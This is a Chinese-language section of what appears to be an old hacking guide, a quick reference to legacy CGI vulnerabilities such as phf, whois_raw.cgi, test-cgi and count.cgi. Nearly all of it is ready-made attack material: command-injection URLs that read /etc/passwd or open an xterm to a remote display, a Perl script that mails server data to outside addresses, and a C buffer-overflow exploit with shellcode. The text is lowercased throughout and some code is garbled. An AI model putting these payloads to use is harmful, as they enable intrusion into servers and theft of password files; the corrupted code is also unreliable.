3.5  cgi及系统漏洞速查

● phf漏洞

漏洞介绍：phf漏洞是最经典了，可以通过浏览器执行服务器的命令来查找，如下     所示：

/etc/passwd

lynx  http://server/cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd   

● php.cgi 2.0beta10或更早版本的漏洞

漏洞介绍：可以读nobody权限的所有文件。

lynx  http://server/cgi-bin/php.cgi?/etc/passwd

注意：

php.cgi 2.1版本的只能读shtml文件，但对于密码文件可能在/etc/master.passwd、/etc/security/passwd路径下。

● whois_raw.cgi

lynx  http://server/cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd

lynx

http://server/cgi-bin/whois_raw.cgi?fqdn=%0a/usr/x11r6/bin/xterm%20-display%20graziella.lame.org:0

● faxsurvey

lynx  http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

● textcounter.pl

漏洞介绍：如果服务器上有textcounter.pl，所有人可以以http守护进程的权限执行    命令。

#!/usr/bin/perl
$url='http://dtp.kappa.ro/a/test.shtml'; # please _do_ _modify_ this
$email='pdoru@pop3.kappa.ro,root'; # please _do_ _modify_ this
if ($argv[0]) { $cmd=$argv[0];}else{
$cmd="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${email} -sanothe
re_one";
}$text="${url}/;ifs=\8;${cmd};echo|";$text =~ s/ /\$\{ifs\}/g;#print "$text\
n";
system({"wget"} "wget", $text, "-o/dev/null");
system({"wget"} "wget", $text, "-o/dev/null");
#system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx
#system({"lynx"} "lynx", $text);

● 一些版本(1.1)的info2www的漏洞

$ request_method=get ./info2www '(../../../../../../../bin/mail jami asswd|)'

$

you have new mail.

$

● pfdispaly.cgi

lynx -source \
'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
pfdisplay.cgi还有另外一个漏洞可以执行命令
lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0a/bin/uname%20-a|'

or
lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?'%0a/usr/bin/x11/xclock%20-display%20evi
l:0.0|'

● wrap

lynx http://server/cgi-bin/wrap?/../../../../../etc

● www-sql

可以让入侵者读一些受限制的页面如：

在浏览器里输入：http://server/protected/something.html，入侵者就会被要求输入账号和口令，而有www-sql就不必了：

http://server/cgi-bin/www-sql/protected/something.html

● view-source

lynx http://server/cgi-bin/view-source?../../../../../../../etc/passwd

● campas

lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

● webgais

telnet www.victim.com 80
post /cgi-bin/webgais http/1.0
content-length: 85 (replace this with the actual length of the "exploit"line)
query=';mail+drazvan\@pop3.kappa.roparagraph

● websendmail

telnet www.victim.com 80
post /cgi-bin/websendmail http/1.0
content-length: xxx (should be replaced with the actual length of thestring passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.orgubject=a&content=a

● handler

telnet www.victim.com 80
get /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=downloadhttp/1.0

或：

get /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=download

或：

get /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=download

注意：

cat后是tab键而不是空格，服务器会报告不能打开useless_shit，但仍旧执行下面命令。

● test-cgi

lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
cgi/1.0 test script report:

argc is 0. argv is .

server_software = ncsa/1.4b

server_name = victim.com

gateway_interface = cgi/1.1

server_protocol = http/1.0

server_port = 80

request_method = get

http_accept = text/plain, application/x-html, application/html,
text/html, text/x-html

path_info =

path_translated =

script_name = /cgi-bin/test-cgi

query_string = whatever

remote_host = xxxx.xxxx.gov

remote_addr = 200.200.200.200

remote_user =

auth_type =

content_type =

content_length =

得到一些http的目录：

lynx http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd

有时可能也不管用，可尝试：

lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*

还可以这样尝试：

get /cgi-bin/test-cgi?* http/1.0

get /cgi-bin/test-cgi?x *

get /cgi-bin/nph-test-cgi?* http/1.0

get /cgi-bin/nph-test-cgi?x *

get /cgi-bin/test-cgi?x http/1.0 *

get /cgi-bin/nph-test-cgi?x http/1.0 *

● 对于某些bsd的apache可以：

lynx http://server/root/etc/passwd

lynx http://server/~root/etc/passwd

● htmlscript

lynx http://server/cgi-bin/htmlscript?../../../../etc/passwd

● frontpage extensions

如果读http://www.victim.com/_vti_inf.html将得到fp extensions的版本和它在服务器上的路径，还有一些密码文件，如：

http://server/_vti_pvt/service.pwd

http://server/_vti_pvt/users.pwd

http://server/_vti_pvt/authors.pwd

http://server/_vti_pvt/administrators.pwd

● vulnerability in glimpse http

telnet target.machine.com 80

get /cgi-bin/aglimpse/80|ifs=5;cmd=5mail5fyodor\@dhp.com\md;echo http/1.0

● count.cgi

该程序只对count.cgi 24以下版本有效：

/*### count.c ########################################################*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

/* forwards */

unsigned long getsp(int);

int usage(char *);

void doit(char *,long, char *);

/* constants */

char shell[]=

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"

"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"

"\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"

"\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"

"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

"/usr/x11r6/bin/xterm0-ut0-display0";

char endpad[]=

"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";

int main (int argc, char *argv[]){

char *shellcode = null;

int cnt,ver,retcount, dispnum,dotquads[4],offset;

unsigned long sp;

char dispname[255];

char *host;

offset = sp = cnt = ver = 0;

fprintf(stderr,"\t%s - gus\n",argv[0]);

if (argc<3) usage(argv[0]);

while ((cnt = getopt(argc,argv,"h:d:v:o:")) != eof) {

switch(cnt){

case 'h':

host = optarg;

break;

case 'd':

{

retcount = sscanf(optarg, "%d.%d.%d.%d:%d",

&dotquads[0],

&dotquads[1],

&dotquads[2],

dotquads[3], &dispnum);

if (retcount != 5) usage(argv[0]);

sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",

dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);

shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad));

sprintf(shellcode,"%s%s%s",shell,dispname,endpad);

}

break;

case 'v':

ver = atoi(optarg);

break;

case 'o':

offset = atoi(optarg);

break;

default:

usage(argv[0]);

break;

}

}

sp = offset + getsp(ver);

(void)doit(host,sp,shellcode);

exit(0);

}

unsigned long getsp(int ver) {

/* get the stack pointer we should be using. ymmv. if it does not work,

try using -o x, where x is between -1500 and 1500 */

unsigned long sp=0;

if (ver == 15) sp = 0xbfffea50;

if (ver == 20) sp = 0xbfffea50;

if (ver == 22) sp = 0xbfffeab4;

if (ver == 23) sp = 0xbfffee38; /* dunno about this one */

if (sp == 0) {

fprintf(stderr,"i don't have an sp for that version try using the -o option.
\n");

fprintf(stderr,"versions above 24 are patched for this bug.\n");

exit(1);

} else {

return sp;

}

}

int usage (char *name) {

fprintf(stderr,"\tusage:%s -h host -d -v [-o ]\n

",name);

fprintf(stderr,"\te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22\n",name);

exit(1);

}

int openhost (char *host, int port) {

int sock;

struct hostent *he;

struct sockaddr_in sa;

he = gethostbyname(host);

if (he == null) {

perror("bad hostname\n");

exit(-1);

}

memcpy(&sa.sin_addr, he->h_addr, he->h_length);

sa.sin_port=htons(port);

sa.sin_family=af_inet;

sock=socket(af_inet,sock_stream,0);

if (sock < 0) {

perror ("cannot open socket");

exit(-1);

}

bzero(&sa.sin_zero,sizeof (sa.sin_zero));

if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) {

perror("cannot connect to host");

exit(-1);

}

return(sock);

}

void doit (char *host,long sp, char *shellcode) {

int cnt,sock;

char qs[7000];

int bufsize = 16;

char buf[bufsize];

char chain[] = "user=a";

bzero(buf);

for(cnt=0;cnt<4104;cnt+=4) {

qs[cnt+0] = sp & 0x000000ff;

qs[cnt+1] = (sp & 0x0000ff00) >> 8;

qs[cnt+2] = (sp & 0x00ff0000) >> 16;

qs[cnt+3] = (sp & 0xff000000) >> 24;

}

strcpy(qs,chain);

qs[strlen(chain)]=0x90;

qs[4104]= sp&0x000000ff;

qs[4105]=(sp&0x0000ff00)>>8;

qs[4106]=(sp&0x00ff0000)>>16;

qs[4107]=(sp&0xff000000)>>24;

qs[4108]= sp&0x000000ff;

qs[4109]=(sp&0x0000ff00)>>8;

qs[4110]=(sp&0x00ff0000)>>16;

qs[4111]=(sp&0xff000000)>>24;

qs[4112]= sp&0x000000ff;

qs[4113]=(sp&0x0000ff00)>>8;

qs[4114]=(sp&0x00ff0000)>>16;

qs[4115]=(sp&0xff000000)>>24;

qs[4116]= sp&0x000000ff;

qs[4117]=(sp&0x0000ff00)>>8;

qs[4118]=(sp&0x00ff0000)>>16;

qs[4119]=(sp&0xff000000)>>24;
qs[4120]= sp&0x000000ff;

qs[4121]=(sp&0x0000ff00)>>8;

qs[4122]=(sp&0x00ff0000)>>16;

qs[4123]=(sp&0xff000000)>>24;

qs[4124]= sp&0x000000ff;

qs[4125]=(sp&0x0000ff00)>>8;

qs[4126]=(sp&0x00ff0000)>>16;

qs[4127]=(sp&0xff000000)>>24;

qs[4128]= sp&0x000000ff;

qs[4129]=(sp&0x0000ff00)>>8;

qs[4130]=(sp&0x00ff0000)>>16;

qs[4131]=(sp&0xff000000)>>24;

strcpy((char*)&qs[4132],shellcode);

sock = openhost(host,80);

write(sock,"get /cgi-bin/count.cgi?",23);

write(sock,qs,strlen(qs));

write(sock," http/1.0\n",10);

write(sock,"user-agent: ",12);

rite(sock,qs,strlen(qs));

write(sock,"\n\n",2);

sleep(1);

/* printf("get /cgi-bin/count.cgi?%s http/1.0\nuser-agent: %s\n\n",qs,qs); *

/

/*

setenv("http_user_agent",qs,1);

setenv("query_string",qs,1);

system("./count.cgi");

*/

}